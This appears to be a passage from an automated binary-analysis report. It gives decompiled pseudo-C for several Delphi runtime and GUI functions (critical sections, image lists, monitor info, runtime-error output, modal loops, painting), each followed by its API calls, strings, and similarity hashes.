                                                                                        LeaveCriticalSection(0x4662e8);
                                                                                        *[fs:eax] = _t74;
                                                                                        *[fs:eax] = _t74;
                                                                                        *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72, *[fs:eax], 0x4205d5, _t72);
                                                                                        _pop(_t66);
                                                                                        *[fs:eax] = _t66;
                                                                                        _t67 = 0x420596;
                                                                                        *[fs:eax] = _t67;
                                                                                        _push(E004205DC);
                                                                                        EnterCriticalSection(0x4662e8);
                                                                                        return 0;
                                                                                    } else {
                                                                                        goto L15;
                                                                                    }
                                                                                }
                                                                            }

                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00420497
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004204A6
                                                                              • Part of subcall function 00420464: ResetEvent.KERNEL32(00000254,004204E1,?,?,00000000), ref: 0042046A
                                                                            • EnterCriticalSection.KERNEL32(004662E8,?,?,00000000), ref: 004204EB
                                                                            • InterlockedExchange.KERNEL32(00461BEC,?), ref: 00420507
                                                                            • LeaveCriticalSection.KERNEL32(004662E8,00000000,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 00420560
                                                                            • EnterCriticalSection.KERNEL32(004662E8,004205DC,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 004205CF
                                                                            Strings
                                                                            • 40F , xrefs: 0042049C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                            • String ID: 40F
                                                                            • API String ID: 2189153385-2631550472
                                                                            • Opcode ID: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7
                                                                            • Instruction ID: ef1ed86c35f2a73ab8eb88fda658a997fa2195ff33e20d550fe0e6f0303cdae6
                                                                            • Opcode Fuzzy Hash: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7
                                                                            • Instruction Fuzzy Hash: DC31D330B04714BFD701EF65E851A6ABBE8EB49704FA184BBF400E2692D77C9850CE2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 56%
                                                                            E004493D8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                intOrPtr _v8;
                                                                                void* __ecx;
                                                                                intOrPtr _t9;
                                                                                void* _t11;
                                                                                intOrPtr _t17;
                                                                                void* _t28;
                                                                                intOrPtr _t33;
                                                                                intOrPtr _t34;
                                                                                intOrPtr _t37;
                                                                                struct HINSTANCE__* _t41;
                                                                                void* _t43;
                                                                                intOrPtr _t45;
                                                                                intOrPtr _t46;

                                                                                _t45 = _t46;
                                                                                _push(__ebx);
                                                                                _t43 = __edx;
                                                                                _t28 = __eax;
                                                                                if( *0x466574 == 0) {
                                                                                    *0x466574 = E0040C9AC("comctl32.dll", __eax);
                                                                                    if( *0x466574 >= 0x60000) {
                                                                                        _t41 = GetModuleHandleA("comctl32.dll");
                                                                                        if(_t41 != 0) {
                                                                                            *0x466578 = GetProcAddress(_t41, "ImageList_WriteEx");
                                                                                        }
                                                                                    }
                                                                                }
                                                                                _v8 = E00421180(_t43, 1, 0);
                                                                                _push(_t45);
                                                                                _push(0x4494d2);
                                                                                _push( *[fs:eax]);
                                                                                *[fs:eax] = _t46;
                                                                                if( *0x466578 == 0) {
                                                                                    _t9 = _v8;
                                                                                    if(_t9 != 0) {
                                                                                        _t9 = _t9 - 0xffffffec;
                                                                                    }
                                                                                    _push(_t9);
                                                                                    _t11 = E00448314(_t28);
                                                                                    _push(_t11);
                                                                                    L004234D8();
                                                                                    if(_t11 == 0) {
                                                                                        _t33 = *0x462c60; // 0x423548
                                                                                        E0040C1D8(_t33, 1);
                                                                                        E00404184();
                                                                                    }
                                                                                } else {
                                                                                    _t17 = _v8;
                                                                                    if(_t17 != 0) {
                                                                                        _t17 = _t17 - 0xffffffec;
                                                                                    }
                                                                                    _push(_t17);
                                                                                    _push(1);
                                                                                    _push(E00448314(_t28));
                                                                                    if( *0x466578() != 0) {
                                                                                        _t34 = *0x462c60; // 0x423548
                                                                                        E0040C1D8(_t34, 1);
                                                                                        E00404184();
                                                                                    }
                                                                                }
                                                                                _pop(_t37);
                                                                                *[fs:eax] = _t37;
                                                                                _push(0x4494d9);
                                                                                return E00403928(_v8);
                                                                            }

                                                                            APIs
                                                                              • Part of subcall function 0040C9AC: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,0040CA82), ref: 0040C9EE
                                                                              • Part of subcall function 0040C9AC: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,0040CA65,?,00000000,?,00000000,0040CA82), ref: 0040CA23
                                                                              • Part of subcall function 0040C9AC: VerQueryValueA.VERSION(?,0040CA94,?,?,00000000,?,00000000,?,00000000,0040CA65,?,00000000,?,00000000,0040CA82), ref: 0040CA3D
                                                                            • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 0044940C
                                                                            • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 0044941D
                                                                            • ImageList_Write.COMCTL32(00000000,?,00000000,004494D2), ref: 0044949C
                                                                            Strings
                                                                            • ImageList_WriteEx , xrefs: 00449417
                                                                            • comctl32.dll , xrefs: 00449407
                                                                            • comctl32.dll , xrefs: 004493EC
                                                                            • H5B , xrefs: 00449470, 004494A5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
                                                                            • String ID: H5B$ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                            • API String ID: 4063495462-2067531044
                                                                            • Opcode ID: 1bd18ea55a635c8a3144036754e74cc9919261c25993034c422739c8a92a9788
                                                                            • Instruction ID: 7feeba355522faf04f3a0e2cb1e42fc148b7a82705179c7db10de74883139383
                                                                            • Opcode Fuzzy Hash: 1bd18ea55a635c8a3144036754e74cc9919261c25993034c422739c8a92a9788
                                                                            • Instruction Fuzzy Hash: 6A21A470704200BBF700EF7AED86A2B37A9AB84758B11013EF801D7391EA7D9D01E65D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                            E00423010(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                                                                void _v20;
                                                                                void* __ebx;
                                                                                void* __edi;
                                                                                void* __esi;
                                                                                void* __ebp;
                                                                                void* _t24;
                                                                                int _t25;
                                                                                struct HMONITOR__* _t28;
                                                                                struct tagMONITORINFO* _t30;
                                                                                intOrPtr* _t32;

                                                                                _t30 = _a8;
                                                                                _t28 = _a4;
                                                                                if( *0x46633c != 0) {
                                                                                    _t25 = 0;
                                                                                    if(_t28 == 0x12340042 && _t30 != 0 && _t30->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0, &_v20, 0) != 0) {
                                                                                        _t30->rcMonitor.left = 0;
                                                                                        _t30->rcMonitor.top = 0;
                                                                                        _t30->rcMonitor.right = GetSystemMetrics(0);
                                                                                        _t30->rcMonitor.bottom = GetSystemMetrics(1);
                                                                                        asm("movsd");
                                                                                        asm("movsd");
                                                                                        asm("movsd");
                                                                                        asm("movsd");
                                                                                        _t32 = _t30;
                                                                                        *(_t32 + 0x24) = 1;
                                                                                        if( *_t32 >= 0x48) {
                                                                                            lstrcpyA(_t32 + 0x28, "DISPLAY");
                                                                                        }
                                                                                        _t25 = 1;
                                                                                    }
                                                                                } else {
                                                                                    *0x466320 = E00422CE4(4, _t24, *0x466320, _t28, _t30);
                                                                                    _t25 = GetMonitorInfoA(_t28, _t30);
                                                                                }
                                                                                return _t25;
                                                                            }

                                                                            APIs
                                                                            • GetMonitorInfoA.USER32(?,?), ref: 00423041
                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423068
                                                                            • GetSystemMetrics.USER32 ref: 0042307D
                                                                            • GetSystemMetrics.USER32 ref: 00423088
                                                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 004230B2
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • GetMonitorInfo , xrefs: 00423028
                                                                            • DISPLAY , xrefs: 004230A9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                            • String ID: DISPLAY$GetMonitorInfo
                                                                            • API String ID: 1539801207-1633989206
                                                                            • Opcode ID: a3a10cab4bb061dffc4b299bcad7828da0626630f6a6faf7876a81cdf98517a1
                                                                            • Instruction ID: 1d13c1e411ecf5a9961b19d848809dc4e278015fb6addf28eb62cabff9c87d63
                                                                            • Opcode Fuzzy Hash: a3a10cab4bb061dffc4b299bcad7828da0626630f6a6faf7876a81cdf98517a1
                                                                            • Instruction Fuzzy Hash: 4F11DC71B003249ED720DF25AC407A7B7F9FB05711F40492AED4597394E7B8AA488BBA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 56%
E004230E4(intOrPtr _a4, intOrPtr* _a8) {
    void _v20;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t24;
    int _t25;
    intOrPtr _t27;
    intOrPtr _t28;
    intOrPtr* _t30;
    intOrPtr* _t32;

    _t30 = _a8;
    _t28 = _a4;
    if( *0x46633d != 0) {
        _t25 = 0;
        if(_t28 == 0x12340042 && _t30 != 0 && *_t30 >= 0x28 && SystemParametersInfoA(0x30, 0, &_v20, 0) != 0) {
            *((intOrPtr*)(_t30 + 4)) = 0;
            *((intOrPtr*)(_t30 + 8)) = 0;
            *((intOrPtr*)(_t30 + 0xc)) = GetSystemMetrics(0);
            *((intOrPtr*)(_t30 + 0x10)) = GetSystemMetrics(1);
            asm("movsd");
            asm("movsd");
            asm("movsd");
            asm("movsd");
            _t32 = _t30;
            *(_t32 + 0x24) = 1;
            if( *_t32 >= 0x48) {
                lstrcpyA(_t32 + 0x28, "DISPLAY");
            }
            _t25 = 1;
        }
    } else {
        _t27 = *0x466324; // 0x4230e4
        *0x466324 = E00422CE4(5, _t24, _t27, _t28, _t30);
        _t25 = *0x466324(_t28, _t30);
    }
    return _t25;
}


                                                                            APIs
                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042313C
                                                                            • GetSystemMetrics.USER32 ref: 00423151
                                                                            • GetSystemMetrics.USER32 ref: 0042315C
                                                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 00423186
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • GetMonitorInfoA , xrefs: 004230FC
                                                                            • 0B , xrefs: 00423101, 0042310E, 00423115
                                                                            • DISPLAY , xrefs: 0042317D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                            • String ID: DISPLAY$GetMonitorInfoA$0B
                                                                            • API String ID: 2545840971-2122693701
                                                                            • Opcode ID: 6412428992578bdd4025669aefdb9b4bb941a51ac52645d491b848b38ed5ebc5
                                                                            • Instruction ID: 8329856f4a0663fa361ed590d044dbc65a5c11abf511ac1c4802788fd1076b43
                                                                            • Opcode Fuzzy Hash: 6412428992578bdd4025669aefdb9b4bb941a51ac52645d491b848b38ed5ebc5
                                                                            • Instruction Fuzzy Hash: CE11CD71700320AFE7208F64AC447A7B7F8EB09311F40452FED5597281E7B8A950CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
E004045BC(void* __ecx) {
    long _v4;
    int _t3;

    if( *0x46304c == 0) {
        if( *0x46102c == 0) {
            _t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
        }
        return _t3;
    } else {
        if( *0x463220 == 0xd7b2 && *0x463228 > 0) {
            *0x463238();
        }
        WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e, &_v4, 0);
        return WriteFile(GetStdHandle(0xfffffff5), E00404644, "true", &_v4, 0);
    }
}


                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56,?,0044C980), ref: 004045F5
                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56), ref: 004045FB
                                                                            • GetStdHandle.KERNEL32(000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404610
                                                                            • WriteFile.KERNEL32(00000000,000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404616
                                                                            • MessageBoxA.USER32 ref: 00404634
                                                                            Strings
                                                                            • Runtime error at 00000000 , xrefs: 004045EE, 0040462D
                                                                            • Error , xrefs: 00404628
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileHandleWrite$Message
                                                                            • String ID: Error$Runtime error at 00000000
                                                                            • API String ID: 1570097196-2970929446
                                                                            • Opcode ID: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7
                                                                            • Instruction ID: 95cfc67e252f177aabf72d71697ea3d849ed0d739da66028a04d1f7d325712f5
                                                                            • Opcode Fuzzy Hash: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7
                                                                            • Instruction Fuzzy Hash: 2CF062A06803C475EA10B7655D46F9622484785F1AF2446BFF310F40F2BAFC89C49B2F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 55%
E00448638(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
    intOrPtr _v8;
    struct HDC__* _v12;
    char _v28;
    char _v44;
    void* __edi;
    void* __ebp;
    void* _t46;
    void* _t57;
    int _t85;
    void* _t119;
    void* _t120;
    void* _t129;
    struct HDC__* _t138;
    struct HDC__* _t139;
    int _t140;
    void* _t141;

    _t121 = __ecx;
    _t137 = __ecx;
    _v8 = __edx;
    _t120 = __eax;
    _t46 = E004481D8(__eax);
    if(_t46 != 0) {
        _t144 = _a4;
        if(_a4 == 0) {
            __eflags = *(_t120 + 0x54);
            if( *(_t120 + 0x54) == 0) {
                _t140 = E00428F64(1);
                *(_t120 + 0x54) = _t140;
                E0042A27C(_t140, 1);
                *((intOrPtr*)( *_t140 + 0x40))();
                _t121 = *_t140;
                *((intOrPtr*)( *_t140 + 0x34))();
            }
            E00426188( *((intOrPtr*)(E00429538( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
            E004193B4(0, *(_t120 + 0x34), 0, &_v44, *(_t120 + 0x30));
            _push( &_v44);
            _t57 = E00429538( *(_t120 + 0x54));
            _pop(_t129);
            E0042652C(_t57, _t129, _t137);
            _push(0);
            _push(0);
            _push(0xffffffff);
            _push(0);
            _push(0);
            _push(0);
            _push(0);
            _push(E0042681C(E00429538( *(_t120 + 0x54))));
            _push(_v8);
            _push(E00448314(_t120));
            L00423490();
            E004193B4(_a16, _a16 + *(_t120 + 0x34), _a12, &_v28, _a12 + *(_t120 + 0x30));
            _v12 = E0042681C(E00429538( *(_t120 + 0x54)));
            E00426188( *((intOrPtr*)(_t137 + 0x14)), _a16 + *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags);
            _t138 = E0042681C(_t137);
            SetTextColor(_t138, 0xffffff);
            SetBkColor(_t138, 0);
            _t85 = _a16 + 1;
            __eflags = _t85;
            BitBlt(_t138, _t85, _a12 + 1, *(_t120 + 0x34), *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
            E00426188( *((intOrPtr*)(_t137 + 0x14)), _a16 + *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85);
            _t139 = E0042681C(_t137);
            SetTextColor(_t139, 0xffffff);
            SetBkColor(_t139, 0);
            return BitBlt(_t139, _a16, _a12, *(_t120 + 0x34), *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
        }
        _push(_a8);
        _push(E00448028(_t144));
        E00448610(_t120, _t144);
        _push(E00448028(_t144));
        _push(0);
        _push(0);
        _push(_a12);
        _push(_a16);
        _push(E0042681C(__ecx));
        _push(_v8);
        _t119 = E00448314(_t120);
        _push(_t119);
        L00423490();
        return _t119;
    }
    return _t46;
}


                                                                            APIs
                                                                            • ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00448697
                                                                            • ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448738
                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00448785
                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0044878D
                                                                            • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 004487B2
                                                                              • Part of subcall function 00448610: ImageList_GetBkColor.COMCTL32(00000000,?,00448671,00000000,?), ref: 00448626
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ColorImageList_$Draw$Text
                                                                            • String ID:
                                                                            • API String ID: 2027629008-0
                                                                            • Opcode ID: 4094665da36111d1273b04d8056914dd580bcbf9be6dc5764fec73b4cc8f8cb7
                                                                            • Instruction ID: c7ff4466aff230b0ce27f37bc18780dc13651bfdc4d4199a20c36a001531123d
                                                                            • Opcode Fuzzy Hash: 4094665da36111d1273b04d8056914dd580bcbf9be6dc5764fec73b4cc8f8cb7
                                                                            • Instruction Fuzzy Hash: F2512D71700114ABDB50FF69DD82F9E37E8AF48704F50005AFA04EB286CA78EC519B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 74%
E00453544(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
    intOrPtr* _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    intOrPtr _v20;
    short _v22;
    intOrPtr _v28;
    struct HWND__* _v32;
    char _v36;
    intOrPtr _t55;
    intOrPtr _t61;
    intOrPtr _t67;
    intOrPtr _t68;
    intOrPtr _t71;
    intOrPtr _t72;
    intOrPtr _t74;
    intOrPtr _t76;
    intOrPtr _t86;
    intOrPtr _t88;
    intOrPtr _t91;
    void* _t96;
    intOrPtr _t105;
    intOrPtr _t133;
    void* _t135;
    void* _t138;
    void* _t139;
    intOrPtr _t140;

    _t136 = __esi;
    _t135 = __edi;
    _t116 = __ebx;
    _t138 = _t139;
    _t140 = _t139 + 0xffffffe0;
    _push(__ebx);
    _push(__esi);
    _v36 = 0;
    _v8 = __eax;
    _push(_t138);
    _push(0x453836);
    _push( *[fs:eax]);
    *[fs:eax] = _t140;
    E00438F48();
    if( *((char*)(_v8 + 0x57)) != 0 || *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x358) & 0x00000008) != 0 || *((char*)(_v8 + 0x277)) == 1) {
        _t55 = *0x462cd4; // 0x423580
        E00406740(_t55, &_v36);
        E0040C11C(_v36, 1);
        E00404184();
    }
    if(GetCapture() != 0) {
        SendMessageA(GetCapture(), 0x1f, 0, 0);
    }
    ReleaseCapture();
    _t61 = *0x466580; // 0x27bf470
    E00455C64(_t61);
    _push(_t138);
    _push(0x453819);
    _push( *[fs:edx]);
    *[fs:edx] = _t140;
    *(_v8 + 0x358) = *(_v8 + 0x358) | 0x00000008;
    if( *((char*)(_v8 + 0x330)) == 0) {
        _t105 = *0x466580; // 0x27bf470
        if( *((char*)(_t105 + 0xd4)) != 0) {
            E0043F0FC(_v8);
            E004423D4(_v8);
        }
    }
    _v32 = GetActiveWindow();
    _v20 = E0044C924();
    _t67 = *0x466584; // 0x27c66a0
    _t68 = *0x466584; // 0x27c66a0
    E0041A888( *((intOrPtr*)(_t68 + 0x7c)), *((intOrPtr*)(_t67 + 0x78)), 0);
    _t71 = *0x466584; // 0x27c66a0
    *((intOrPtr*)(_t71 + 0x78)) = _v8;
    _t72 = *0x466584; // 0x27c66a0
    _v22 = *(_t72 + 0x44) & 0x0000ffff;
    _t74 = *0x466584; // 0x27c66a0
    E00454B28(_t74, 0);
    _t76 = *0x466584; // 0x27c66a0
    _v28 = *((intOrPtr*)(_t76 + 0x48));
    _v16 = E0044CA08(0, _t116, _t135, _t136);
    _push(_t138);
    _push(0x4537f7);
    _push( *[fs:edx]);
    *[fs:edx] = _t140;
    E00453454(_v8);
    _push(_t138);
    _push(0x453756);
    _push( *[fs:edx]);
    *[fs:edx] = _t140;
    SendMessageA(E004423F8(_v8), 0xb000, 0, 0);
    *((intOrPtr*)(_v8 + 0x294)) = 0;
    do {
        _t86 = *0x466580; // 0x27bf470
        E00456DA0(_t86);
        _t88 = *0x466580; // 0x27bf470
        if( *((char*)(_t88 + 0xa4)) == 0) {
            if( *((intOrPtr*)(_v8 + 0x294)) != 0) {
                E004533B4(_v8);
            }
        } else {
            *((intOrPtr*)(_v8 + 0x294)) = 2;
        }
        _t91 = *((intOrPtr*)(_v8 + 0x294));
    } while (_t91 == 0);
    _v12 = _t91;
    SendMessageA(E004423F8(_v8), 0xb001, 0, 0);
    _t96 = E004423F8(_v8);
    if(_t96 != GetActiveWindow()) {
        _v32 = 0;
    }
    _pop(_t133);
    *[fs:eax] = _t133;
    _push(0x45375d);
    return E0045344C();
}


                                                                            APIs
                                                                            • GetCapture.USER32 ref: 004535B5
                                                                            • GetCapture.USER32 ref: 004535C4
                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004535CA
                                                                            • ReleaseCapture.USER32(00000000,00453836), ref: 004535CF
                                                                            • GetActiveWindow.USER32 ref: 00453620
                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 004536B6
                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00453723
                                                                            • GetActiveWindow.USER32 ref: 00453732
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                            • String ID:
                                                                            • API String ID: 862346643-0
                                                                            • Opcode ID: 9e28f5377d61abf311c9daef1181d16d300c76bc30cf22954581ec0863c717ce
                                                                            • Instruction ID: c71c2c127747cc088a0eefe62a95ea86982853baf425fc74ebc282f5ae4e7b0f
                                                                            • Opcode Fuzzy Hash: 9e28f5377d61abf311c9daef1181d16d300c76bc30cf22954581ec0863c717ce
                                                                            • Instruction Fuzzy Hash: AA519F70A00244AFDB11EF65C986B5D77F1EF49345F1544BAF804AB3A2EB78AE44CB08
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                                                                                  E00440210(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __esi, void* __eflags, intOrPtr _a4) { 				intOrPtr _v8; 				struct HDC__* _v12; 				int _v16; 				struct tagRECT _v32; 				signed int _t68; 				intOrPtr _t74; 				intOrPtr _t81; 				int _t102; 				void* _t104; 				void* _t105; 				intOrPtr _t119; 				int _t125; 				void* _t126; 				void* _t129;  				_v12 = __edx; 				_v8 = __eax; 				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000080; 				_v16 = SaveDC(_v12); 				_push(_t129); 				_push(0x440388); 				_push( *[fs:edx]); 				 *[fs:edx] = _t129 + 0xffffffe4; 				E00439028(_v12, _a4, __ecx); 				IntersectClipRect(_v12, 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c)); 				_t102 = 0; 				_t125 = 0; 				if((GetWindowLongA(E004423F8(_v8), 0xffffffec) & 0x00000002) == 0) { 					_t68 = GetWindowLongA(E004423F8(_v8), 0xfffffff0); 					__eflags = _t68 & 0x00800000; 					if((_t68 & 0x00800000) != 0) { 						_t125 = 3; 						_t102 = 0xa00f; 					} 				} else { 					_t125 = 0xa; 					_t102 = 0x200f; 				} 				if(_t102 != 0) { 					SetRect( &_v32, 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c)); 					DrawEdge(_v12,  &_v32, _t125, _t102); 					E00439028(_v12, _v32.top, _v32.left); 					IntersectClipRect(_v12, 0, 0, _v32.right - _v32.left, _v32.bottom - _v32.top); 				} 				E0043BC9C(_v8, _v12, 0x14, 0); 				E0043BC9C(_v8, _v12, 0xf, 0); 				_t74 =  *((intOrPtr*)(_v8 + 0x1d0)); 				if(_t74 == 0) { 					L12: 					_pop(_t119); 					 *[fs:eax] = _t119; 					_push(0x44038f); 					return RestoreDC(_v12, _v16); 				} else { 					_t104 =  *((intOrPtr*)(_t74 + 8)) - 1; 					if(_t104 < 0) { 						goto L12; 					} 					_t105 = _t104 + 1; 					_t126 = 0; 					do { 						_t81 = E0041A80C( *((intOrPtr*)(_v8 + 0x1d0)), _t126); 						_t138 =  *((char*)(_t81 + 0x57)); 						if( *((char*)(_t81 + 0x57)) != 0) { 							E00440210(_t81, _t105,  *((intOrPtr*)(_t81 + 
0x40)), _v12, _t126, _t138,  *((intOrPtr*)(_t81 + 0x44))); 						} 						_t126 = _t126 + 1; 						_t105 = _t105 - 1; 					} while (_t105 != 0); 					goto L12; 				} 			}                        


                                                                            APIs
                                                                            • SaveDC.GDI32(?), ref: 0044022D
                                                                              • Part of subcall function 00439028: GetWindowOrgEx.GDI32(00000000), ref: 00439036
                                                                              • Part of subcall function 00439028: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0043904C
                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440266
                                                                            • GetWindowLongA.USER32 ref: 0044027A
                                                                            • GetWindowLongA.USER32 ref: 0044029B
                                                                            • SetRect.USER32 ref: 004402CB
                                                                            • DrawEdge.USER32(?,?,00000000,00000000), ref: 004402DA
                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440303
                                                                            • RestoreDC.GDI32(?,?), ref: 00440382
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
